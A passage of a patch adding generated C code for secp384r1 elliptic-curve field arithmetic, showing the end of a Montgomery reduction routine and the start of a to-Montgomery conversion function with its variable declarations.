fiat_secp384r1_addcarryx_u32(&x848, &x849, x847, x821, x818); ++ fiat_secp384r1_addcarryx_u32(&x850, &x851, x849, x819, x816); ++ fiat_secp384r1_addcarryx_u32(&x852, &x853, 0x0, x792, x834); ++ fiat_secp384r1_addcarryx_u32(&x854, &x855, x853, x794, x835); ++ fiat_secp384r1_addcarryx_u32(&x856, &x857, x855, x796, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x858, &x859, x857, x798, x832); ++ fiat_secp384r1_addcarryx_u32(&x860, &x861, x859, x800, x836); ++ fiat_secp384r1_addcarryx_u32(&x862, &x863, x861, x802, x838); ++ fiat_secp384r1_addcarryx_u32(&x864, &x865, x863, x804, x840); ++ fiat_secp384r1_addcarryx_u32(&x866, &x867, x865, x806, x842); ++ fiat_secp384r1_addcarryx_u32(&x868, &x869, x867, x808, x844); ++ fiat_secp384r1_addcarryx_u32(&x870, &x871, x869, x810, x846); ++ fiat_secp384r1_addcarryx_u32(&x872, &x873, x871, x812, x848); ++ fiat_secp384r1_addcarryx_u32(&x874, &x875, x873, x814, x850); ++ fiat_secp384r1_addcarryx_u32(&x876, &x877, x875, ((uint32_t)x815 + x791), ++ (x851 + x817)); ++ fiat_secp384r1_addcarryx_u32(&x878, &x879, 0x0, x854, (arg1[11])); ++ fiat_secp384r1_addcarryx_u32(&x880, &x881, x879, x856, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x882, &x883, x881, x858, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x884, &x885, x883, x860, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x886, &x887, x885, x862, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x888, &x889, x887, x864, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x890, &x891, x889, x866, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x892, &x893, x891, x868, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x894, &x895, x893, x870, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x896, &x897, x895, x872, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x898, &x899, x897, x874, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x900, &x901, x899, x876, 0x0); ++ fiat_secp384r1_mulx_u32(&x902, &x903, x878, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x904, &x905, x878, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x906, &x907, x878, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x908, &x909, x878, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x910, &x911, x878, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x912, &x913, x878, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x914, &x915, x878, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x916, &x917, x878, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x918, &x919, x878, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x920, &x921, x878, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x922, &x923, 0x0, x919, x916); ++ fiat_secp384r1_addcarryx_u32(&x924, &x925, x923, x917, x914); ++ fiat_secp384r1_addcarryx_u32(&x926, &x927, x925, x915, x912); ++ fiat_secp384r1_addcarryx_u32(&x928, &x929, x927, x913, x910); ++ fiat_secp384r1_addcarryx_u32(&x930, &x931, x929, x911, x908); ++ fiat_secp384r1_addcarryx_u32(&x932, &x933, x931, x909, x906); ++ fiat_secp384r1_addcarryx_u32(&x934, &x935, x933, x907, x904); ++ fiat_secp384r1_addcarryx_u32(&x936, &x937, x935, x905, x902); ++ fiat_secp384r1_addcarryx_u32(&x938, &x939, 0x0, x878, x920); ++ fiat_secp384r1_addcarryx_u32(&x940, &x941, x939, x880, x921); ++ fiat_secp384r1_addcarryx_u32(&x942, &x943, x941, x882, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x944, &x945, x943, x884, x918); ++ fiat_secp384r1_addcarryx_u32(&x946, &x947, x945, x886, x922); ++ fiat_secp384r1_addcarryx_u32(&x948, &x949, x947, x888, x924); ++ fiat_secp384r1_addcarryx_u32(&x950, &x951, x949, x890, x926); ++ fiat_secp384r1_addcarryx_u32(&x952, &x953, x951, x892, x928); ++ fiat_secp384r1_addcarryx_u32(&x954, &x955, x953, x894, x930); ++ fiat_secp384r1_addcarryx_u32(&x956, &x957, x955, x896, x932); ++ fiat_secp384r1_addcarryx_u32(&x958, &x959, x957, x898, x934); ++ fiat_secp384r1_addcarryx_u32(&x960, &x961, x959, x900, x936); ++ fiat_secp384r1_addcarryx_u32(&x962, &x963, x961, ((uint32_t)x901 + x877), ++ (x937 + x903)); ++ fiat_secp384r1_subborrowx_u32(&x964, &x965, 0x0, x940, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x966, &x967, x965, x942, 0x0); ++ fiat_secp384r1_subborrowx_u32(&x968, &x969, x967, x944, 0x0); ++ fiat_secp384r1_subborrowx_u32(&x970, &x971, x969, x946, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x972, &x973, x971, x948, ++ UINT32_C(0xfffffffe)); ++ fiat_secp384r1_subborrowx_u32(&x974, &x975, x973, x950, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x976, &x977, x975, x952, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x978, &x979, x977, x954, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x980, &x981, x979, x956, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x982, &x983, x981, x958, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x984, &x985, x983, x960, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x986, &x987, x985, x962, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x988, &x989, x987, x963, 0x0); ++ fiat_secp384r1_cmovznz_u32(&x990, x989, x964, x940); ++ fiat_secp384r1_cmovznz_u32(&x991, x989, x966, x942); ++ fiat_secp384r1_cmovznz_u32(&x992, x989, x968, x944); ++ fiat_secp384r1_cmovznz_u32(&x993, x989, x970, x946); ++ fiat_secp384r1_cmovznz_u32(&x994, x989, x972, x948); ++ fiat_secp384r1_cmovznz_u32(&x995, x989, x974, x950); ++ fiat_secp384r1_cmovznz_u32(&x996, x989, x976, x952); ++ fiat_secp384r1_cmovznz_u32(&x997, x989, x978, x954); ++ fiat_secp384r1_cmovznz_u32(&x998, x989, x980, x956); ++ fiat_secp384r1_cmovznz_u32(&x999, x989, x982, x958); ++ fiat_secp384r1_cmovznz_u32(&x1000, x989, x984, x960); ++ fiat_secp384r1_cmovznz_u32(&x1001, x989, x986, x962); ++ out1[0] = x990; ++ out1[1] = x991; ++ out1[2] = x992; ++ out1[3] = x993; ++ out1[4] = x994; ++ out1[5] = x995; ++ out1[6] = x996; ++ out1[7] = x997; ++ out1[8] = x998; ++ out1[9] = x999; ++ out1[10] = x1000; ++ out1[11] = x1001; ++} ++ ++/* ++ * The function fiat_secp384r1_to_montgomery translates a field element into the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = eval arg1 mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ */ ++static void ++fiat_secp384r1_to_montgomery(uint32_t out1[12], ++ const uint32_t arg1[12]) ++{ ++ uint32_t x1; ++ uint32_t x2; ++ uint32_t x3; ++ uint32_t x4; ++ uint32_t x5; ++ uint32_t x6; ++ uint32_t x7; ++ uint32_t x8; ++ uint32_t x9; ++ uint32_t x10; ++ uint32_t x11; ++ uint32_t x12; ++ uint32_t x13; ++ uint32_t x14; ++ uint32_t x15; ++ uint32_t x16; ++ uint32_t x17; ++ uint32_t x18; ++ uint32_t x19; ++ uint32_t x20; ++ uint32_t x21; ++ fiat_secp384r1_uint1 x22; ++ uint32_t x23; ++ uint32_t x24; ++ uint32_t x25; ++ uint32_t x26; ++ uint32_t x27; ++ uint32_t x28; ++ uint32_t x29; ++ uint32_t x30; ++ uint32_t x31; ++ uint32_t x32; ++ uint32_t x33; ++ uint32_t x34; ++ uint32_t x35; ++ uint32_t x36; ++ uint32_t x37; ++ uint32_t x38; ++ uint32_t x39; ++ uint32_t x40; ++ uint32_t x41; ++ uint32_t x42; ++ uint32_t x43; ++ fiat_secp384r1_uint1 x44; ++ uint32_t x45; ++ fiat_secp384r1_uint1 x46; ++ uint32_t x47; ++ fiat_secp384r1_uint1 x48; ++ uint32_t x49; ++ fiat_secp384r1_uint1 x50; ++ uint32_t x51; ++ fiat_secp384r1_uint1 x52; ++ uint32_t x53; ++ fiat_secp384r1_uint1 x54; ++ uint32_t x55; ++ fiat_secp384r1_uint1 x56; ++ uint32_t x57; ++ fiat_secp384r1_uint1 x58; ++ uint32_t x59; ++ fiat_secp384r1_uint1 x60; ++ uint32_t x61; ++ fiat_secp384r1_uint1 x62; ++ uint32_t x63; ++ fiat_secp384r1_uint1 x64; ++ uint32_t x65; ++ fiat_secp384r1_uint1 x66; ++ uint32_t x67; ++ fiat_secp384r1_uint1 x68; ++ uint32_t x69; ++ fiat_secp384r1_uint1 x70; ++ uint32_t x71; ++ fiat_secp384r1_uint1 x72; ++ uint32_t x73; ++ fiat_secp384r1_uint1 x74; ++ uint32_t x75; ++ fiat_secp384r1_uint1 x76; ++ uint32_t x77; ++ fiat_secp384r1_uint1 x78; ++ uint32_t x79; ++ fiat_secp384r1_uint1 x80; ++ uint32_t x81; ++ fiat_secp384r1_uint1 x82; ++ uint32_t x83; ++ uint32_t x84; ++ uint32_t x85; ++ uint32_t x86; ++ uint32_t x87; ++ uint32_t x88; ++ uint32_t x89; ++ uint32_t x90; ++ uint32_t x91; ++ fiat_secp384r1_uint1 x92; ++ uint32_t x93; ++ fiat_secp384r1_uint1 x94; ++ uint32_t x95; ++ fiat_secp384r1_uint1 x96; ++ uint32_t x97; ++ fiat_secp384r1_uint1 x98; ++ uint32_t x99; ++ fiat_secp384r1_uint1 x100; ++ uint32_t x101; ++ fiat_secp384r1_uint1 x102; ++ uint32_t x103; ++ fiat_secp384r1_uint1 x104; ++ uint32_t x105; ++ fiat_secp384r1_uint1 x106; ++ uint32_t x107; ++ fiat_secp384r1_uint1 x108; ++ uint32_t x109; ++ fiat_secp384r1_uint1 x110; ++ uint32_t x111; ++ fiat_secp384r1_uint1 x112; ++ uint32_t x113; ++ fiat_secp384r1_uint1 x114; ++ uint32_t x115; ++ fiat_secp384r1_uint1 x116; ++ uint32_t x117; ++ uint32_t x118; ++ uint32_t x119; ++ uint32_t x120; ++ uint32_t x121; ++ uint32_t x122; ++ uint32_t x123; ++ uint32_t x124; ++ uint32_t x125; ++ uint32_t x126; ++ uint32_t x127; ++ uint32_t x128; ++ uint32_t x129; ++ uint32_t x130; ++ uint32_t x131; ++ uint32_t x132; ++ uint32_t x133; ++ uint32_t x134; ++ uint32_t x135; ++ uint32_t x136; ++ uint32_t x137; ++ fiat_secp384r1_uint1 x138; ++ uint32_t x139; ++ fiat_secp384r1_uint1 x140; ++ uint32_t x141; ++ fiat_secp384r1_uint1 x142; ++ uint32_t x143; ++ fiat_secp384r1_uint1 x144; ++ uint32_t x145; ++ fiat_secp384r1_uint1 x146; ++ uint32_t x147; ++ fiat_secp384r1_uint1 x148; ++ uint32_t x149; ++ fiat_secp384r1_uint1 x150; ++ uint32_t x151; ++ fiat_secp384r1_uint1 x152; ++ uint32_t x153; ++ fiat_secp384r1_uint1 x154; ++ uint32_t x155; ++ fiat_secp384r1_uint1 x156; ++ uint32_t x157; ++ fiat_secp384r1_uint1 x158; ++ uint32_t x159; ++ fiat_secp384r1_uint1 x160; ++ uint32_t x161; ++ fiat_secp384r1_uint1 x162; ++ uint32_t x163; ++ fiat_secp384r1_uint1 x164; ++ uint32_t x165; ++ fiat_secp384r1_uint1 x166; ++ uint32_t x167; ++ fiat_secp384r1_uint1 x168; ++ uint32_t x169; ++ fiat_secp384r1_uint1 x170; ++ uint32_t x171; ++ fiat_secp384r1_uint1 x172; ++ uint32_t x173; ++ fiat_secp384r1_uint1 x174; ++ uint32_t x175; ++ fiat_secp384r1_uint1 x176; ++ uint32_t x177; ++ fiat_secp384r1_uint1 x178; ++ uint32_t x179; ++ uint32_t x180; ++ uint32_t x181; ++ uint32_t x182; ++ uint32_t x183; ++ uint32_t x184; ++ uint32_t x185; ++ uint32_t x186; ++ uint32_t x187; ++ fiat_secp384r1_uint1 x188; ++ uint32_t x189; ++ fiat_secp384r1_uint1 x190; ++ uint32_t x191; ++ fiat_secp384r1_uint1 x192; ++ uint32_t x193; ++ fiat_secp384r1_uint1 x194; ++ uint32_t x195; ++ fiat_secp384r1_uint1 x196; ++ uint32_t x197; ++ fiat_secp384r1_uint1 x198; ++ uint32_t x199; ++ fiat_secp384r1_uint1 x200; ++ uint32_t x201; ++ fiat_secp384r1_uint1 x202; ++ uint32_t x203; ++ fiat_secp384r1_uint1 x204; ++ uint32_t x205; ++ fiat_secp384r1_uint1 x206; ++ uint32_t x207; ++ fiat_secp384r1_uint1 x208; ++ uint32_t x209; ++ fiat_secp384r1_uint1 x210; ++ uint32_t x211; ++ fiat_secp384r1_uint1 x212; ++ uint32_t x213; ++ uint32_t x214; ++ uint32_t x215; ++ uint32_t x216; ++ uint32_t x217; ++ uint32_t x218; ++ uint32_t x219; ++ uint32_t x220; ++ uint32_t x221; ++ uint32_t x222; ++ uint32_t x223; ++ uint32_t x224; ++ uint32_t x225; ++ uint32_t x226; ++ uint32_t x227; ++ uint32_t x228; ++ uint32_t x229; ++ uint32_t x230; ++ uint32_t x231; ++ uint32_t x232; ++ uint32_t x233; ++ fiat_secp384r1_uint1 x234; ++ uint32_t x235; ++ fiat_secp384r1_uint1 x236; ++ uint32_t x237; ++ fiat_secp384r1_uint1 x238; ++ uint32_t x239; ++ fiat_secp384r1_uint1 x240; ++ uint32_t x241; ++ fiat_secp384r1_uint1 x242; ++ uint32_t x243; ++ fiat_secp384r1_uint1 x244; ++ uint32_t x245; ++ fiat_secp384r1_uint1 x246; ++ uint32_t x247; ++ fiat_secp384r1_uint1 x248; ++ uint32_t x249; ++ fiat_secp384r1_uint1 x250; ++ uint32_t x251; ++ fiat_secp384r1_uint1 x252; ++ uint32_t x253; ++ fiat_secp384r1_uint1 x254; ++ uint32_t x255; ++ fiat_secp384r1_uint1 x256; ++ uint32_t x257; ++ fiat_secp384r1_uint1 x258; ++ uint32_t x259; ++ fiat_secp384r1_uint1 x260; ++ uint32_t x261; ++ fiat_secp384r1_uint1 x262; ++ uint32_t x263; ++ fiat_secp384r1_uint1 x264; ++ uint32_t x265; ++ fiat_secp384r1_uint1 x266; ++ uint32_t x267; ++ fiat_secp384r1_uint1 x268; ++ uint32_t x269; ++ fiat_secp384r1_uint1 x270; ++ uint32_t x271; ++ fiat_secp384r1_uint1 x272; ++ uint32_t x273; ++ fiat_secp384r1_uint1 x274; ++ uint32_t x275; ++ uint32_t x276; ++ uint32_t x277; ++ uint32_t x278; ++ uint32_t x279; ++ uint32_t x280; ++ uint32_t x281; ++ uint32_t x282; ++ uint32_t x283; ++ fiat_secp384r1_uint1 x284; ++ uint32_t x285; ++ fiat_secp384r1_uint1 x286; ++ uint32_t x287; ++ fiat_secp384r1_uint1 x288; ++ uint32_t x289; ++ fiat_secp384r1_uint1 x290; ++ uint32_t x291; ++ fiat_secp384r1_uint1 x292; ++ uint32_t x293; ++ fiat_secp384r1_uint1 x294; ++ uint32_t x295; ++ fiat_secp384r1_uint1 x296; ++ uint32_t x297; ++ fiat_secp384r1_uint1 x298; ++ uint32_t x299; ++ fiat_secp384r1_uint1 x300; ++ uint32_t x301; ++ fiat_secp384r1_uint1 x302; ++ uint32_t x303; ++ fiat_secp384r1_uint1 x304; ++ uint32_t x305; ++ fiat_secp384r1_uint1 x306; ++ uint32_t x307; ++ fiat_secp384r1_uint1 x308; ++ uint32_t x309; ++ uint32_t x310; ++ uint32_t x311; ++ uint32_t x312; ++ uint32_t x313; ++ uint32_t x314; ++ uint32_t x315; ++ uint32_t x316; ++ uint32_t x317; ++ uint32_t x318; ++ uint32_t x319; ++ uint32_t x320; ++ uint32_t x321; ++ uint32_t x322; ++ uint32_t x323; ++ uint32_t x324; ++ uint32_t x325; ++ uint32_t x326; ++ uint32_t x327; ++ uint32_t x328; ++ uint32_t x329; ++ fiat_secp384r1_uint1 x330; ++ uint32_t x331; ++ fiat_secp384r1_uint1 x332; ++ uint32_t x333; ++ fiat_secp384r1_uint1 x334; ++ uint32_t x335; ++ fiat_secp384r1_uint1 x336; ++ uint32_t x337; ++ fiat_secp384r1_uint1 x338; ++ uint32_t x339; ++ fiat_secp384r1_uint1 x340; ++ uint32_t x341; ++ fiat_secp384r1_uint1 x342; ++ uint32_t x343; ++ fiat_secp384r1_uint1 x344; ++ uint32_t x345; ++ fiat_secp384r1_uint1 x346; ++ uint32_t x347; ++ fiat_secp384r1_uint1 x348; ++ uint32_t x349; ++ fiat_secp384r1_uint1 x350; ++ uint32_t x351; ++ fiat_secp384r1_uint1 x352; ++ uint32_t x353; ++ fiat_secp384r1_uint1 x354; ++ uint32_t x355; ++ fiat_secp384r1_uint1 x356; ++ uint32_t x357; ++ fiat_secp384r1_uint1 x358; ++ uint32_t x359; ++ fiat_secp384r1_uint1 x360; ++ uint32_t x361; ++ fiat_secp384r1_uint1 x362; ++ uint32_t x363; ++ fiat_secp384r1_uint1 x364; ++ uint32_t x365; ++ fiat_secp384r1_uint1 x366; ++ uint32_t x367; ++ fiat_secp384r1_uint1 x368; ++ uint32_t x369; ++ fiat_secp384r1_uint1 x370; ++ uint32_t x371; ++ uint32_t x372; ++ uint32_t x373; ++ uint32_t x374; ++ uint32_t x375; ++ uint32_t x376; ++ uint32_t x377; ++ uint32_t x378; ++ uint32_t x379; ++ fiat_secp384r1_uint1 x380; ++ uint32_t x381; ++ fiat_secp384r1_uint1 x382; ++ uint32_t x383; ++ fiat_secp384r1_uint1 x384; ++ uint32_t x385; ++ fiat_secp384r1_uint1 x386; ++ uint32_t x387; ++ fiat_secp384r1_uint1 x388; ++ uint32_t x389; ++ fiat_secp384r1_uint1 x390; ++ uint32_t x391; ++ fiat_secp384r1_uint1 x392; ++ uint32_t x393; ++ fiat_secp384r1_uint1 x394; ++ uint32_t x395; ++ fiat_secp384r1_uint1 x396; ++ uint32_t x397; ++ fiat_secp384r1_uint1 x398; ++ uint32_t x399; ++ fiat_secp384r1_uint1 x400; ++ uint32_t x401; ++ fiat_secp384r1_uint1 x402; ++ uint32_t x403; ++ fiat_secp384r1_uint1 x404; ++ uint32_t x405; ++ uint32_t x406; ++ uint32_t x407; ++ uint32_t x408; ++ uint32_t x409; ++ uint32_t x410; ++ uint32_t x411; ++ uint32_t x412; ++ uint32_t x413; ++ uint32_t x414; ++ uint32_t x415; ++ uint32_t x416; ++ uint32_t x417; ++ uint32_t x418; ++ uint32_t x419; ++ uint32_t x420; ++ uint32_t x421; ++ uint32_t x422; ++ uint32_t x423; ++ uint32_t x424; ++ uint32_t x425; ++ fiat_secp384r1_uint1 x426; ++ uint32_t x427; ++ fiat_secp384r1_uint1 x428; ++ uint32_t x429; ++ fiat_secp384r1_uint1 x430; ++ uint32_t x431; ++ fiat_secp384r1_uint1 x432; ++ uint32_t x433; ++ fiat_secp384r1_uint1 x434; ++ uint32_t x435; ++ fiat_secp384r1_uint1 x436; ++ uint32_t x437; ++ fiat_secp384r1_uint1 x438; ++ uint32_t x439; ++ fiat_secp384r1_uint1 x440; ++ uint32_t x441; ++ fiat_secp384r1_uint1 x442; ++ uint32_t x443; ++ fiat_secp384r1_uint1 x444; ++ uint32_t x445; ++ fiat_secp384r1_uint1 x446; ++ uint32_t x447; ++ fiat_secp384r1_uint1 x448; ++ uint32_t x449; ++ fiat_secp384r1_uint1 x450; ++ uint32_t x451; ++ fiat_secp384r1_uint1 x452; ++ uint32_t x453; ++ fiat_secp384r1_uint1 x454; ++ uint32_t x455; ++ fiat_secp384r1_uint1 x456; ++ uint32_t x457; ++ fiat_secp384r1_uint1 x458; ++ uint32_t x459; ++ fiat_secp384r1_uint1 x460; ++ uint32_t x461; ++ fiat_secp384r1_uint1 x462; ++ uint32_t x463; ++ fiat_secp384r1_uint1 x464; ++ uint32_t x465; ++ fiat_secp384r1_uint1 x466; ++ uint32_t x467; ++ uint32_t x468; ++ uint32_t x469; ++ uint32_t x470; ++ uint32_t x471; ++ uint32_t x472; ++ uint32_t x473; ++ uint32_t x474; ++ uint32_t x475; ++ fiat_secp384r1_uint1 x476; ++ uint32_t x477; ++ fiat_secp384r1_uint1 x478; ++ uint32_t x479; ++ fiat_secp384r1_uint1 x480; ++ uint32_t x481; ++ fiat_secp384r1_uint1 x482; ++ uint32_t x483; ++ fiat_secp384r1_uint1 x484; ++ uint32_t x485; ++ fiat_secp384r1_uint1 x486; ++ uint32_t x487; ++ fiat_secp384r1_uint1 x488; ++ uint32_t x489; ++ fiat_secp384r1_uint1 x490; ++ uint32_t x491; ++ fiat_secp384r1_uint1 x492; ++ uint32_t x493; ++ fiat_secp384r1_uint1 x494; ++ uint32_t x495; ++ fiat_secp384r1_uint1 x496; ++ uint32_t x497; ++ fiat_secp384r1_uint1 x498; ++ uint32_t x499; ++ fiat_secp384r1_uint1 x500; ++ uint32_t x501; ++ uint32_t x502; ++ uint32_t x503; ++ uint32_t x504; ++ uint32_t x505; ++ uint32_t x506; ++ uint32_t x507; ++ uint32_t x508; ++ uint32_t x509; ++ uint32_t x510; ++ uint32_t x511; ++ uint32_t x512; ++ uint32_t x513; ++ uint32_t x514; ++ uint32_t x515; ++ uint32_t x516; ++ uint32_t x517; ++ uint32_t x518; ++ uint32_t x519; ++ uint32_t x520; ++ uint32_t x521; ++ fiat_secp384r1_uint1 x522; ++ uint32_t x523; ++ fiat_secp384r1_uint1 x524; ++ uint32_t x525; ++ fiat_secp384r1_uint1 x526; ++ uint32_t x527; ++ fiat_secp384r1_uint1 x528; ++ uint32_t x529; ++ fiat_secp384r1_uint1 x530; ++ uint32_t x531; ++ fiat_secp384r1_uint1 x532; ++ uint32_t x533; ++ fiat_secp384r1_uint1 x534; ++ uint32_t x535; ++ fiat_secp384r1_uint1 x536; ++ uint32_t x537; ++ fiat_secp384r1_uint1 x538; ++ uint32_t x539; ++ fiat_secp384r1_uint1 x540; ++ uint32_t x541; ++ fiat_secp384r1_uint1 x542; ++ uint32_t x543; ++ fiat_secp384r1_uint1 x544; ++ uint32_t x545; ++ fiat_secp384r1_uint1 x546; ++ uint32_t x547; ++ fiat_secp384r1_uint1 x548; ++ uint32_t x549; ++ fiat_secp384r1_uint1 x550; ++ uint32_t x551; ++ fiat_secp384r1_uint1 x552; ++ uint32_t x553; ++ fiat_secp384r1_uint1 x554; ++ uint32_t x555; ++ fiat_secp384r1_uint1 x556; ++ uint32_t x557; ++ fiat_secp384r1_uint1 x558; ++ uint32_t x559; ++ fiat_secp384r1_uint1 x560; ++ uint32_t x561; ++ fiat_secp384r1_uint1 x562; ++ uint32_t x563; ++ uint32_t x564; ++ uint32_t x565; ++ uint32_t x566; ++ uint32_t x567; ++ uint32_t x568; ++ uint32_t x569; ++ uint32_t x570; ++ uint32_t x571; ++ fiat_secp384r1_uint1 x572; ++ uint32_t x573; ++ fiat_secp384r1_uint1 x574; ++ uint32_t x575; ++ fiat_secp384r1_uint1 x576; ++ uint32_t x577; ++ fiat_secp384r1_uint1 x578; ++ uint32_t x579; ++ fiat_secp384r1_uint1 x580; ++ uint32_t x581; ++ fiat_secp384r1_uint1 x582; ++ uint32_t x583; ++ fiat_secp384r1_uint1 x584; ++ uint32_t x585; ++ fiat_secp384r1_uint1 x586; ++ uint32_t x587; ++ fiat_secp384r1_uint1 x588; ++ uint32_t x589; ++ fiat_secp384r1_uint1 x590; ++ uint32_t x591; ++ fiat_secp384r1_uint1 x592; ++ uint32_t x593; ++ fiat_secp384r1_uint1 x594; ++ uint32_t x595; ++ fiat_secp384r1_uint1 x596; ++ uint32_t x597; ++ uint32_t x598; ++ uint32_t x599; ++ uint32_t x600; ++ uint32_t x601; ++ uint32_t x602; ++ uint32_t x603; ++ uint32_t x604; ++ uint32_t x605; ++ uint32_t x606; ++ uint32_t x607; ++ uint32_t x608; ++ uint32_t x609; ++ uint32_t x610; ++ uint32_t x611; ++ uint32_t x612; ++ uint32_t x613; ++ uint32_t x614; ++ uint32_t x615; ++ uint32_t x616; ++ uint32_t x617; ++ fiat_secp384r1_uint1 x618; ++ uint32_t x619; ++ fiat_secp384r1_uint1 x620; ++ uint32_t x621; ++ fiat_secp384r1_uint1 x622; ++ uint32_t x623; ++ fiat_secp384r1_uint1 x624; ++ uint32_t x625; ++ fiat_secp384r1_uint1 x626; ++ uint32_t x627; ++ fiat_secp384r1_uint1 x628; ++ uint32_t x629; ++ fiat_secp384r1_uint1 x630; ++ uint32_t x631; ++ fiat_secp384r1_uint1 x632; ++ uint32_t x633; ++ fiat_secp384r1_uint1 x634; ++ uint32_t x635; ++ fiat_secp384r1_uint1 x636; ++ uint32_t x637; ++ fiat_secp384r1_uint1 x638; ++ uint32_t x639; ++ fiat_secp384r1_uint1 x640; ++ uint32_t x641; ++ fiat_secp384r1_uint1 x642; ++ uint32_t x643; ++ fiat_secp384r1_uint1 x644; ++ uint32_t x645; ++ fiat_secp384r1_uint1 x646; ++ uint32_t x647; ++ fiat_secp384r1_uint1 x648; ++ uint32_t x649; ++ fiat_secp384r1_uint1 x650; ++ uint32_t x651; ++ fiat_secp384r1_uint1 x652; ++ uint32_t x653; ++ fiat_secp384r1_uint1 x654; ++ uint32_t x655; ++ fiat_secp384r1_uint1 x656; ++ uint32_t x657; ++ fiat_secp384r1_uint1 x658; ++ uint32_t x659; ++ uint32_t x660; ++ uint32_t x661; ++ uint32_t x662; ++ uint32_t x663; ++ uint32_t x664; ++ uint32_t x665; ++ uint32_t x666; ++ uint32_t x667; ++ fiat_secp384r1_uint1 x668; ++ uint32_t x669; ++ fiat_secp384r1_uint1 x670; ++ uint32_t x671; ++ fiat_secp384r1_uint1 x672; ++ uint32_t x673; ++ fiat_secp384r1_uint1 x674; ++ uint32_t x675; ++ fiat_secp384r1_uint1 x676; ++ uint32_t x677; ++ fiat_secp384r1_uint1 x678; ++ uint32_t x679; ++ fiat_secp384r1_uint1 x680; ++ uint32_t x681; ++ fiat_secp384r1_uint1 x682; ++ uint32_t x683; ++ fiat_secp384r1_uint1 x684; ++ uint32_t x685; ++ fiat_secp384r1_uint1 x686; ++ uint32_t x687; ++ fiat_secp384r1_uint1 x688; ++ uint32_t x689; ++ fiat_secp384r1_uint1 x690; ++ uint32_t x691; ++ fiat_secp384r1_uint1 x692; ++ uint32_t x693; ++ uint32_t x694; ++ uint32_t x695; ++ uint32_t x696; ++ uint32_t x697; ++ uint32_t x698; ++ uint32_t x699; ++ uint32_t x700; ++ uint32_t x701; ++ uint32_t x702; ++ uint32_t x703; ++ uint32_t x704; ++ uint32_t x705; ++ uint32_t x706; ++ uint32_t x707; ++ uint32_t x708; ++ uint32_t x709; ++ uint32_t x710; ++ uint32_t x711; ++ uint32_t x712; ++ uint32_t x713; ++ fiat_secp384r1_uint1 x714; ++ uint32_t x715; ++ fiat_secp384r1_uint1 x716; ++ uint32_t x717; ++ fiat_secp384r1_uint1 x718; ++ uint32_t x719; ++ fiat_secp384r1_uint1 x720; ++ uint32_t x721; ++ fiat_secp384r1_uint1 x722; ++ uint32_t x723; ++ fiat_secp384r1_uint1 x724; ++ uint32_t x725; ++ fiat_secp384r1_uint1 x726; ++ uint32_t x727; ++ fiat_secp384r1_uint1 x728; ++ uint32_t x729; ++ fiat_secp384r1_uint1 x730; ++ uint32_t x731; ++ fiat_secp384r1_uint1 x732; ++ uint32_t x733; ++ fiat_secp384r1_uint1 x734; ++ uint32_t x735; ++ fiat_secp384r1_uint1 x736; ++ uint32_t x737; ++ fiat_secp384r1_uint1 x738; ++ uint32_t x739; ++ fiat_secp384r1_uint1 x740; ++ uint32_t x741; ++ fiat_secp384r1_uint1 x742; ++ uint32_t x743; ++ fiat_secp384r1_uint1 x744; ++ uint32_t x745; ++ fiat_secp384r1_uint1 x746; ++ uint32_t x747; ++ fiat_secp384r1_uint1 x748; ++ uint32_t x749; ++ fiat_secp384r1_uint1 x750; ++ uint32_t x751; ++ fiat_secp384r1_uint1 x752; ++ uint32_t x753; ++ fiat_secp384r1_uint1 x754; ++ uint32_t x755; ++ uint32_t x756; ++ uint32_t x757; ++ uint32_t x758; ++ uint32_t x759; ++ uint32_t x760; ++ uint32_t x761; ++ uint32_t x762; ++ uint32_t x763; ++ 